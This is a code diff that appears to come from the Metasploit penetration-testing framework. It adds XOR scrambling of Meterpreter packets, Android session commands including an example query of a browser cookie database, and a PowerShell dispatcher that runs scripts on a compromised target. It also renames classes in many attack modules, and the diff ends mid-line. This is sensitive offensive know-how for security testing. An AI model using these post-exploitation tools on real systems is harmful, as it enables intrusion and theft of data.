a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb index 43481cdc8f..4469a1e633 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb @@ -34,7 +34,9 @@ class Thread < Rex::Post::Thread self.process = process self.handle = handle self.tid = tid - ObjectSpace.define_finalizer( self, self.class.finalize(self.process.client, self.handle) ) + + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(process.client, handle)) end def self.finalize(client,handle) @@ -168,7 +170,11 @@ class Thread < Rex::Post::Thread # Instance method def close - self.class.close(self.process.client, self.handle) + unless self.handle.nil? + ObjectSpace.undefine_finalizer(self) + self.class.close(self.process.client, self.handle) + self.handle = nil + end end attr_reader :process, :handle, :tid # :nodoc: diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb index 0dcb281df7..3736e8faa6 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb @@ -66,7 +66,7 @@ class Webcam remote_browser_path = webrtc_browser_path - if remote_browser_path.blank? + if remote_browser_path.to_s.strip.empty? fail "Unable to find a suitable browser on the target machine" end diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 459fb2d4bb..372324381f 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -665,6 +665,44 @@ class Packet < GroupTlv end end + # + # Override the function that creates the raw byte stream for + # sending so that it generates an XOR key, uses it to scramble + # the serialized TLV content, and then returns the key plus the + # scrambled data as the payload. + # + def to_r + raw = super + xor_key = rand(254) + 1 + xor_key |= (rand(254) + 1) << 8 + xor_key |= (rand(254) + 1) << 16 + xor_key |= (rand(254) + 1) << 24 + result = [xor_key].pack('N') + xor_bytes(xor_key, raw) + result + end + + # + # Override the function that reads from a raw byte stream so + # that the XORing of data is included in the process prior to + # passing it on to the default functionality that can parse + # the TLV values. + # + def from_r(bytes) + xor_key = bytes[0,4].unpack('N')[0] + super(xor_bytes(xor_key, bytes[4, bytes.length])) + end + + # + # Xor a set of bytes with a given DWORD xor key. + # + def xor_bytes(xor_key, bytes) + result = '' + bytes.bytes.zip([xor_key].pack('V').bytes.cycle).each do |b| + result << (b[0].ord ^ b[1].ord).chr + end + result + end + ## # # Conditionals diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb index db5681c8ce..dd604496a4 100644 --- a/lib/rex/post/meterpreter/packet_dispatcher.rb +++ b/lib/rex/post/meterpreter/packet_dispatcher.rb @@ -117,8 +117,7 @@ module PacketDispatcher self.last_checkin = Time.now - # If the first 4 bytes are "RECV", return the oldest packet from the outbound queue - if req.body[0,4] == "RECV" + if req.method == 'GET' rpkt = send_queue.shift resp.body = rpkt || '' begin @@ -176,6 +175,7 @@ module PacketDispatcher end end + if bytes.to_i == 0 # Mark the session itself as dead self.alive = false diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb index 8aebe3de39..c4c93d6b37 100644 --- a/lib/rex/post/meterpreter/packet_parser.rb +++ b/lib/rex/post/meterpreter/packet_parser.rb @@ -12,6 +12,11 @@ module Meterpreter ### class PacketParser + # 4 byte xor + # 4 byte length + # 4 byte type + HEADER_SIZE = 12 + # # Initializes the packet parser context with an optional cipher. # @@ -26,7 +31,7 @@ class PacketParser # def reset self.raw = '' - self.hdr_length_left = 8 + self.hdr_length_left = HEADER_SIZE self.payload_length_left = 0 end @@ -34,6 +39,9 @@ class PacketParser # Reads data from the wire and parse as much of the packet as possible. # def recv(sock) + # Create a typeless packet + packet = Packet.new(0) + if (self.hdr_length_left > 0) buf = sock.read(self.hdr_length_left) @@ -49,7 +57,10 @@ class PacketParser # payload length left to the number of bytes # specified in the length if (self.hdr_length_left == 0) - self.payload_length_left = raw.unpack("N")[0] - 8 + xor_key = raw[0, 4].unpack('N')[0] + length_bytes = packet.xor_bytes(xor_key, raw[4, 4]) + # header size doesn't include the xor key, which is always tacked on the front + self.payload_length_left = length_bytes.unpack("N")[0] - (HEADER_SIZE - 4) end elsif (self.payload_length_left > 0) buf = sock.read(self.payload_length_left) @@ -67,14 +78,11 @@ class PacketParser if ((self.hdr_length_left == 0) && (self.payload_length_left == 0)) - # Create a typeless packet - packet = Packet.new(0) - # TODO: cipher decryption if (cipher) end - # Serialize the packet from the raw buffer + # Deserialize the packet from the raw buffer packet.from_r(self.raw) # Reset our state diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 8030c3329c..c3d0f48aa9 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -29,7 +29,10 @@ class Console::CommandDispatcher::Android 'device_shutdown' => 'Shutdown device', 'send_sms' => 'Sends SMS from target session', 'wlan_geolocate' => 'Get current lat-long using WLAN information', - 'interval_collect' => 'Manage interval collection capabilities' + 'interval_collect' => 'Manage interval collection capabilities', + 'activity_start' => 'Start an Android activity from a Uri string', + 'sqlite_query' => 'Query a SQLite database from storage', + 'set_audio_mode' => 'Set Ringer Mode' } reqs = { @@ -41,7 +44,10 @@ class Console::CommandDispatcher::Android 'device_shutdown' => ['device_shutdown'], 'send_sms' => ['send_sms'], 'wlan_geolocate' => ['wlan_geolocate'], - 'interval_collect' => ['interval_collect'] + 'interval_collect' => ['interval_collect'], + 'activity_start' => ['activity_start'], + 'sqlite_query' => ['sqlite_query'], + 'set_audio_mode' => ['set_audio_mode'] } # Ensure any requirements of the command are met @@ -151,11 +157,41 @@ class Console::CommandDispatcher::Android end end + def cmd_set_audio_mode(*args) + help = false + mode = 1 + set_audio_mode_opts = Rex::Parser::Arguments.new( + '-h' => [ false, "Help Banner" ], + '-m' => [ true, "Set Mode - (0 - Off, 1 - Normal, 2 - Max) (Default: '#{mode}')"] + ) + + set_audio_mode_opts.parse(args) do |opt, _idx, val| + case opt + when '-h' + help = true + when '-m' + mode = val.to_i + else + help = true + end + end + + if help || mode < 0 || mode > 2 + print_line('Usage: set_audio_mode [options]') + print_line('Set Ringer mode.') + print_line(set_audio_mode_opts.usage) + return + end + + client.android.set_audio_mode(mode) + print_status("Ringer mode was changed to #{mode}!") + end + def cmd_dump_sms(*args) path = "sms_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt" dump_sms_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for sms list'] + '-o' => [ true, 'Output path for sms list'] ) dump_sms_opts.parse(args) do |opt, _idx, val| @@ -243,7 +279,7 @@ class Console::CommandDispatcher::Android dump_contacts_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for contacts list'] + '-o' => [ true, 'Output path for contacts list'] ) dump_contacts_opts.parse(args) do |opt, _idx, val| @@ -347,7 +383,7 @@ class Console::CommandDispatcher::Android dump_calllog_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for call log'] + '-o' => [ true, 'Output path for call log'] ) @@ -457,7 +493,7 @@ class Console::CommandDispatcher::Android end end - if dest.blank? || body.blank? + if dest.to_s.empty? || body.to_s.empty? print_error("You must enter both a destination address -d and the SMS text body -t") print_error('e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."') print_line(send_sms_opts.usage) @@ -509,7 +545,7 @@ class Console::CommandDispatcher::Android wlan_list << [mac, ssid, ss.to_s] end - if wlan_list.blank? + if wlan_list.to_s.empty? print_error("Unable to enumerate wireless networks from the target. Wireless may not be present or enabled.") return end @@ -528,6 +564,71 @@ class Console::CommandDispatcher::Android end end + def cmd_activity_start(*args) + if (args.length < 1) + print_line("Usage: activity_start \n") + print_line("Start an Android activity from a uri") + return + end + + uri = args[0] + result = client.android.activity_start(uri) + if result.nil? + print_status("Intent started") + else + print_error("Error: #{result}") + end + end + + def cmd_sqlite_query(*args) + sqlite_query_opts = Rex::Parser::Arguments.new( + '-h' => [ false, 'Help Banner' ], + '-d' => [ true, 'The sqlite database file'], + '-q' => [ true, 'The sqlite statement to execute'], + '-w' => [ false, 'Open the database in writable mode (for INSERT/UPDATE statements)'] + ) + + writeable = false + database = '' + query = '' + sqlite_query_opts.parse(args) do |opt, _idx, val| + case opt + when '-h' + print_line("Usage: sqlite_query -d -q \n") + print_line(sqlite_query_opts.usage) + return + when '-d' + database = val + when '-q' + query = val + when '-w' + writeable = true + end + end + + if database.blank? || query.blank? + print_error("You must enter both a database files and a query") + print_error("e.g. sqlite_query -d /data/data/com.android.browser/databases/webviewCookiesChromium.db -q 'SELECT * from cookies'") + print_line(sqlite_query_opts.usage) + return + end + + result = client.android.sqlite_query(database, query, writeable) + unless writeable + header = "#{query} on database file #{database}" + table = Rex::Ui::Text::Table.new( + 'Header' => header, + 'Columns' => result[:columns], + 'Indent' => 0 + ) + result[:rows].each do |e| + table << e + end + print_line + print_line(table.to_s) + end + end + # # Name for this dispatcher # diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index bd390e0685..7163d40674 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -866,7 +866,7 @@ class Console::CommandDispatcher::Core end pid = val.to_i when '-N' - if val.blank? + if val.to_s.empty? print_error("No process name provided") return end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb new file mode 100644 index 0000000000..9634db26cc --- /dev/null +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb @@ -0,0 +1,159 @@ +# -*- coding: binary -*- +require 'rex/post/meterpreter' + +module Rex +module Post +module Meterpreter +module Ui + +### +# +# Powershell extension - interact with a Powershell interpreter +# +### +class Console::CommandDispatcher::Powershell + + Klass = Console::CommandDispatcher::Powershell + + include Console::CommandDispatcher + + # + # Name for this dispatcher + # + def name + 'Powershell' + end + + # + # List of supported commands. + # + def commands + { + 'powershell_import' => 'Import a PS1 script or .NET Assembly DLL', + 'powershell_shell' => 'Create an interactive Powershell prompt', + 'powershell_execute' => 'Execute a Powershell command string' + } + end + + @@powershell_shell_opts = Rex::Parser::Arguments.new( + '-s' => [true, 'Specify the id/name of the Powershell session to interact with.'], + '-h' => [false, 'Help banner'] + ) + + def powershell_shell_usage + print_line('Usage: powershell_shell [-s session-id]') + print_line + print_line('Creates an interactive Powershell prompt.') + print_line(@@powershell_shell_opts.usage) + end + + # + # Create an interactive powershell prompts + # + def cmd_powershell_shell(*args) + if args.include?('-h') + powershell_shell_usage + return false + end + + opts = {} + + @@powershell_shell_opts.parse(args) { |opt, idx, val| + case opt + when '-s' + opts[:session_id] = val + end + } + + channel = client.powershell.shell(opts) + shell.interact_with_channel(channel) + end + + @@powershell_import_opts = Rex::Parser::Arguments.new( + '-s' => [true, 'Specify the id/name of the Powershell session to run the command in.'], + '-h' => [false, 'Help banner'] + ) + + def powershell_import_usage + print_line('Usage: powershell_import [-s session-id]') + print_line + print_line('Imports a powershell script or assembly into the target.') + print_line('The file must end in ".ps1" or ".dll".') + print_line('Powershell scripts can be loaded into any session (via -s).') + print_line('.NET assemblies are applied to all sessions.') + print_line(@@powershell_import_opts.usage) + end + + # + # Import a script or assembly component into the target. + # + def cmd_powershell_import(*args) + if args.length == 0 || args.include?('-h') + powershell_import_usage + return false + end + + opts = { + file: args.shift + } + + @@powershell_import_opts.parse(args) { |opt, idx, val| + case opt + when '-s' + opts[:session_id] = val + end + } + + result = client.powershell.import_file(opts) + if result.nil? || result == false + print_error("File failed to load.") + elsif result == true || result.empty? + print_good("File successfully imported. No result was returned.") + else + print_good("File successfully imported. Result:\n#{result}") + end + end + + @@powershell_execute_opts = Rex::Parser::Arguments.new( + '-s' => [true, 'Specify the id/name of the Powershell session to run the command in.'], + '-h' => [false, 'Help banner'] + ) + + def powershell_execute_usage + print_line('Usage: powershell_execute [-s session-id]') + print_line + print_line('Runs the given Powershell string on the target.') + print_line(@@powershell_execute_opts.usage) + end + + # + # Execute a simple Powershell command string + # + def cmd_powershell_execute(*args) + if args.length == 0 || args.include?('-h') + powershell_execute_usage + return false + end + + opts = { + code: args.shift + } + + @@powershell_execute_opts.parse(args) { |opt, idx, val| + case opt + when '-s' + opts[:session_id] = val + end + } + + result = client.powershell.execute_string(opts) + print_good("Command execution completed:\n#{result}") + end + +end + +end +end +end +end + diff --git a/lib/rex/proto/dcerpc/svcctl/packet.rb b/lib/rex/proto/dcerpc/svcctl/packet.rb index 6d27f6b849..7e65cb86cd 100644 --- a/lib/rex/proto/dcerpc/svcctl/packet.rb +++ b/lib/rex/proto/dcerpc/svcctl/packet.rb @@ -53,7 +53,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error getting scm handle: #{e}") + print_error("Error getting scm handle: #{e}") end [scm_handle, scm_status] @@ -124,7 +124,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error creating service: #{e}") + print_error("Error creating service: #{e}") end return svc_handle, svc_status @@ -149,7 +149,7 @@ class Client response = dcerpc_client.call(CHANGE_SERVICE_CONFIG2_W, stubdata) # ChangeServiceConfig2 svc_status = error_code(response) rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error changing service description : #{e}") + print_error("Error changing service description : #{e}") end svc_status @@ -169,7 +169,7 @@ class Client svc_status = error_code(response[20,4]) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error closing service handle: #{e}") + print_error("Error closing service handle: #{e}") end svc_status @@ -195,7 +195,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error opening service handle: #{e}") + print_error("Error opening service handle: #{e}") end svc_handle @@ -219,7 +219,7 @@ class Client svc_status = error_code(response) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error starting service: #{e}") + print_error("Error starting service: #{e}") end svc_status @@ -249,7 +249,7 @@ class Client svc_status = error_code(response[28,4]) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error controlling service: #{e}") + print_error("Error controlling service: #{e}") end svc_status @@ -268,7 +268,7 @@ class Client svc_status = error_code(response) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error deleting service: #{e}") + print_error("Error deleting service: #{e}") end svc_status @@ -292,7 +292,7 @@ class Client ret = 2 end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error deleting service: #{e}") + print_error("Error deleting service: #{e}") end ret diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index a048138269..f47229a0bb 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -391,8 +391,9 @@ class ClientRequest # # Return the content length header + # def set_content_len_header(clen) - return "" if opts['chunked_size'] > 0 + return "" if clen == 0 || opts['chunked_size'] > 0 || (opts['headers'] && opts['headers']['Content-Length']) set_formatted_header("Content-Length", clen) end diff --git a/lib/rex/proto/kademlia/bootstrap_response.rb b/lib/rex/proto/kademlia/bootstrap_response.rb index b985ba51a7..f9e0b7bece 100644 --- a/lib/rex/proto/kademlia/bootstrap_response.rb +++ b/lib/rex/proto/kademlia/bootstrap_response.rb @@ -51,14 +51,14 @@ module Kademlia bootstrap_peer_id = Rex::Proto::Kademlia.decode_peer_id(message.body.slice!(0, 16)) bootstrap_tcp_port, bootstrap_version, num_peers = message.body.slice!(0, 5).unpack('vCv') # protocol says there are no peers and the body confirms this, so just return with no peers - if num_peers == 0 && message.body.blank? + if num_peers == 0 && message.body.to_s.strip.empty? peers = [] else peers_data = message.body # peers data is too long/short, abort return if peers_data.size % BOOTSTRAP_PEER_SIZE != 0 peers = [] - until peers_data.blank? + until peers_data.to_s.strip.empty? peer_data = peers_data.slice!(0, BOOTSTRAP_PEER_SIZE) peer_id = Rex::Proto::Kademlia.decode_peer_id(peer_data.slice!(0, 16)) ip, udp_port, tcp_port, version = peer_data.unpack('VvvC') diff --git a/lib/rex/socket/ssl_tcp.rb b/lib/rex/socket/ssl_tcp.rb index 6539330307..f37ee3f4c8 100644 --- a/lib/rex/socket/ssl_tcp.rb +++ b/lib/rex/socket/ssl_tcp.rb @@ -65,7 +65,7 @@ begin when 'SSL2', :SSLv2 version = :SSLv2 # 'TLS' will be the new name for autonegotation with newer versions of OpenSSL - when 'SSL23', :SSLv23, 'TLS' + when 'SSL23', :SSLv23, 'TLS', 'Auto' version = :SSLv23 when 'SSL3', :SSLv3 version = :SSLv3 @@ -124,6 +124,11 @@ begin # Tie the context to a socket self.sslsock = OpenSSL::SSL::SSLSocket.new(self, self.sslctx) + # If peerhost looks like a hostname, set the undocumented 'hostname' + # attribute on sslsock, which enables the Server Name Indication (SNI) + # extension + self.sslsock.hostname = self.peerhost if !Rex::Socket.dotted_ip?(self.peerhost) + # Force a negotiation timeout begin Timeout.timeout(params.timeout) do diff --git a/lib/rex/zip/blocks.rb b/lib/rex/zip/blocks.rb index 3f0da7ecba..b2a4589710 100644 --- a/lib/rex/zip/blocks.rb +++ b/lib/rex/zip/blocks.rb @@ -116,7 +116,7 @@ class CentralDir end def pack - if @entry.central_dir_name.blank? + if @entry.central_dir_name.to_s.strip.empty? path = @entry.relative_path else path = @entry.central_dir_path diff --git a/lib/rex/zip/entry.rb b/lib/rex/zip/entry.rb index b1c4a352dc..b934d02814 100644 --- a/lib/rex/zip/entry.rb +++ b/lib/rex/zip/entry.rb @@ -76,7 +76,7 @@ class Entry end def central_dir_path - return nil if @central_dir_name.blank? + return nil if @central_dir_name.to_s.strip.empty? get_relative_path(@central_dir_name) end diff --git a/lib/tasks/custom_cucumber.rake b/lib/tasks/custom_cucumber.rake index 3dab9d0697..9b8c3fb8ae 100644 --- a/lib/tasks/custom_cucumber.rake +++ b/lib/tasks/custom_cucumber.rake @@ -12,6 +12,12 @@ begin t.fork = true # You may get faster startup if you set this to false t.profile = 'boot' end + Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t| + t.binary = vendored_cucumber_bin # If nil, the gem's binary is used. + t.fork = true # You may get faster startup if you set this to false + t.profile = 'exploit' + end + end rescue LoadError diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 104d24fbf7..31874f7c22 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -55,22 +55,22 @@ Gem::Specification.new do |spec| # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb) spec.add_runtime_dependency 'bcrypt' # Needed for Javascript obfuscation - spec.add_runtime_dependency 'jsobfu', '~> 0.3.0' + spec.add_runtime_dependency 'jsobfu', '~> 0.4.1' # Needed for some admin modules (scrutinizer_add_user.rb) spec.add_runtime_dependency 'json' # Metasm compiler/decompiler/assembler spec.add_runtime_dependency 'metasm', '~> 1.0.2' # Metasploit::Concern hooks - spec.add_runtime_dependency 'metasploit-concern', '1.0.0' + spec.add_runtime_dependency 'metasploit-concern' # Metasploit::Credential database models - spec.add_runtime_dependency 'metasploit-credential', '1.0.1' + spec.add_runtime_dependency 'metasploit-credential', '1.1.0' # Database models shared between framework and Pro. - spec.add_runtime_dependency 'metasploit_data_models', '1.2.10' + spec.add_runtime_dependency 'metasploit_data_models', '1.3.0' # Things that would normally be part of the database model, but which # are needed when there's no database - spec.add_runtime_dependency 'metasploit-model', '1.0.0' + spec.add_runtime_dependency 'metasploit-model', '1.1.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.0.22' + spec.add_runtime_dependency 'metasploit-payloads', '1.1.6' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. @@ -89,6 +89,11 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'recog', '2.0.14' # required for bitlocker fvek extraction spec.add_runtime_dependency 'openssl-ccm', '1.2.1' + # Needed for documentation generation + spec.add_runtime_dependency 'octokit' + spec.add_runtime_dependency 'redcarpet' + # Needed for Microsoft patch finding tool (msu_finder) + spec.add_runtime_dependency 'patch_finder', '>= 1.0.2' # rb-readline doesn't work with Ruby Installer due to error with Fiddle: # NoMethodError undefined method `dlopen' for Fiddle:Module diff --git a/modules/auxiliary/admin/2wire/xslt_password_reset.rb b/modules/auxiliary/admin/2wire/xslt_password_reset.rb index ee2572bebb..22b3306bdf 100644 --- a/modules/auxiliary/admin/2wire/xslt_password_reset.rb +++ b/modules/auxiliary/admin/2wire/xslt_password_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb index d3aed5b3dc..a240380762 100644 --- a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb +++ b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/appletv/appletv_display_image.rb b/modules/auxiliary/admin/appletv/appletv_display_image.rb index 5b009c7889..7d2a259628 100644 --- a/modules/auxiliary/admin/appletv/appletv_display_image.rb +++ b/modules/auxiliary/admin/appletv/appletv_display_image.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/appletv/appletv_display_video.rb b/modules/auxiliary/admin/appletv/appletv_display_video.rb index ff0370dc4a..c6a2d3d7f8 100644 --- a/modules/auxiliary/admin/appletv/appletv_display_video.rb +++ b/modules/auxiliary/admin/appletv/appletv_display_video.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/atg/atg_client.rb b/modules/auxiliary/admin/atg/atg_client.rb index 5560f2f76d..00af98129b 100644 --- a/modules/auxiliary/admin/atg/atg_client.rb +++ b/modules/auxiliary/admin/atg/atg_client.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner @@ -225,9 +225,9 @@ class Metasploit3 < Msf::Auxiliary when 'SET_TANK_NAME' # send the set tank name command to change the tank name(s) if tank_number == 0 - vprint_status("#{peer} -- setting all tank names to #{tank_name}") + vprint_status("Setting all tank names to #{tank_name}") else - vprint_status("#{peer} -- setting tank ##{tank_number}'s name to #{tank_name}") + vprint_status("Setting tank ##{tank_number}'s name to #{tank_name}") end request = "#{action.opts[protocol_opt_name]}#{format('%02d', tank_number)}#{tank_name}\n" sock.put(request) @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Auxiliary # send an inventory probe to show that it succeeded inventory_probe = "#{actions.find { |a| a.name == 'INVENTORY' }.opts[protocol_opt_name]}\n" inventory_response = get_response(inventory_probe) - message = "#{peer} #{protocol} #{action.opts['Description']}:\n#{inventory_response}" + message = "#{protocol} #{action.opts['Description']}:\n#{inventory_response}" if inventory_response.include?(tank_name) print_good message else @@ -245,7 +245,7 @@ class Metasploit3 < Msf::Auxiliary end else response = get_response("#{action.opts[protocol_opt_name]}\n") - print_good("#{peer} #{protocol} #{action.opts['Description']}:\n#{response}") + print_good("#{protocol} #{action.opts['Description']}:\n#{response}") end ensure disconnect diff --git a/modules/auxiliary/admin/backupexec/dump.rb b/modules/auxiliary/admin/backupexec/dump.rb index 7f76f33d07..2348397fe4 100644 --- a/modules/auxiliary/admin/backupexec/dump.rb +++ b/modules/auxiliary/admin/backupexec/dump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::NDMP diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 171d2d7a04..6cef2bf11d 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include ::Rex::Platforms::Windows diff --git a/modules/auxiliary/admin/chromecast/chromecast_reset.rb b/modules/auxiliary/admin/chromecast/chromecast_reset.rb index cd245599e9..123faba0f9 100644 --- a/modules/auxiliary/admin/chromecast/chromecast_reset.rb +++ b/modules/auxiliary/admin/chromecast/chromecast_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/chromecast/chromecast_youtube.rb b/modules/auxiliary/admin/chromecast/chromecast_youtube.rb index 5263d13b1f..e11ac04cc8 100644 --- a/modules/auxiliary/admin/chromecast/chromecast_youtube.rb +++ b/modules/auxiliary/admin/chromecast/chromecast_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb index 6d93c9e626..2f574d8494 100644 --- a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb +++ b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb index c706eea4f0..43b4479c0b 100644 --- a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb +++ b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/db2/db2rcmd.rb b/modules/auxiliary/admin/db2/db2rcmd.rb index 6f8d5738fb..c712a12ebf 100644 --- a/modules/auxiliary/admin/db2/db2rcmd.rb +++ b/modules/auxiliary/admin/db2/db2rcmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb index ce62291515..f6dc37ff67 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb index 9fbc5aff7d..462536d3ff 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb index e2970315f0..df41d4d671 100644 --- a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb index 1c54a65368..881f0d5e75 100644 --- a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/firetv/firetv_youtube.rb b/modules/auxiliary/admin/firetv/firetv_youtube.rb index ffeedd5885..8fec58c5e0 100644 --- 